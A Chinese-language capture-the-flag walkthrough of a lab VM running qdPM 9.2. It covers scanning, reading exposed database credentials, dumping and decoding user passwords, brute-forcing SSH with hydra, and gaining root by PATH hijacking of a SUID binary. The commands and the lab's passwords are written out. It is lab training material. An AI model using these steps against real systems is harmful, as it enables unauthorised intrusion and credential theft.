目录
简介
该靶场前期考验的是我们的信息收集能力,通过信息收集找到一个框架的漏洞,再通过该漏洞进入数据库,找到远程连接ssh的账号密码,通过hydra爆破确认账号密码,内网部分是通过信息收集,主要是通过靶场给的提示去进一步找到文件,然后通过自己创建一个具有权限的文档,达到提权的目的。(有能力的小伙伴可以跟我小编的概述先自己去做一遍,不懂得再去看提升可能会更大哦!)
kali主机:192.168.1.58
靶机:192.168.1.18
信息收集
0x01 主机发现
发现靶机可以使用多种方式,这边举例三种
arp-scan -l
netdiscover -r 192.168.1.1/24 #当前网段
nmap -sP 192.168.1.1/24 #当前网段
0x02 端口扫描
nmap -sV -T5 -p- -A 192.168.1.18
登入80端口,发现是一个登入界面
在登入界面中发现下面存在qdPM 9.2的信息
0x03 目录爆破
其实这一步可以不要,这边是使用两种方法去做一个信息收集,上面我们得到那个框架信息我们就可以直接去找漏洞,也就是可以直接跳到漏洞利用部分。
dirb http://192.168.1.18
把爆破的目录可以都去看看,这边我们主要是看core文件下的config文件里面的databases.yml
发现mysql的账号密码
账号:qdpmadmin
密码:UcVQCMQk2STVeS6J
漏洞利用
0x04 查找poc
上面我们发现qdPM 9.2的信息,我们可以在msf去寻找他的漏洞
searchsploit qdPM 9.2 #查询该漏洞
locate php/webapps/50176.txt #查询漏洞poc位置
cp /usr/share/exploitdb/exploits/php/webapps/50176.txt . #复制该漏洞到当前位置
cat 50176.txt #查看poc
0x05 进入数据库
发现一条默认地址,我们可以访问(上面我们爆破出来了,咱们就直接利用了)
mysql -uqdpmadmin -pUcVQCMQk2STVeS6J -h 192.168.1.18
show databases;
use staff
show tables;
select * from user;
select * from login;
发现密码是加密的,这里我们直接通过base64解密
账号:
meyer
dexter
travis
lucas
smith
密码:(解密后)
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
cqNnBWCByS2DuJSy
DJceVy98W28Y7wLg
把他们分别放入users.txt和passwd.txt后,使用hydra爆破。
hydra -L users.txt -P passwd.txt 192.168.1.18 ssh
爆破出两组账号密码
[22][ssh] host: 192.168.1.18 login: dexter password: 7ZwV4qtg42cmUXGX
[22][ssh] host: 192.168.1.18 login: travis password: DJceVy98W28Y7wLg
使用ssh连接
提权
0x06 内网信息收集
第一个连接travis,连接后发现有个flag,并没有其他可以利用的信息,sudo也不能提权,我们直接跳过到第二个。
ICA{Secret_Project}
登入到dexter
发现一个note.txt
It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.
这个时候我们要去寻找一些执行文件,我们通过find去找
find / -perm -4000 2>/dev/null
通过验证,发现第一个是存在利用点的
strings get_access
0x07 提权
这个时候我们发现cat我们调用不了,我们需要自己创建一个。
创建cat时发现其他目录环境不能写入进去,我们得进入/home里去执行。
cd /home
echo "/bin/bash" > /tmp/cat #写一个假的cat
export PATH=/tmp:$PATH #将当前目录写入到环境
chmod +x /tmp/cat #给cat权限
echo $PATH #查看有没有写入成功
/opt/get_access #执行
提权成功,去到root目录下找到第二个fiag
总结
涉及知识点:
1.信息收集
2.漏洞的查找和利用
收获:这个靶场相对而言是比较简单的,主要是信息收集占大部分时间,利用漏洞点也比较好理解,希望小伙伴可以好好消化里面的知识点。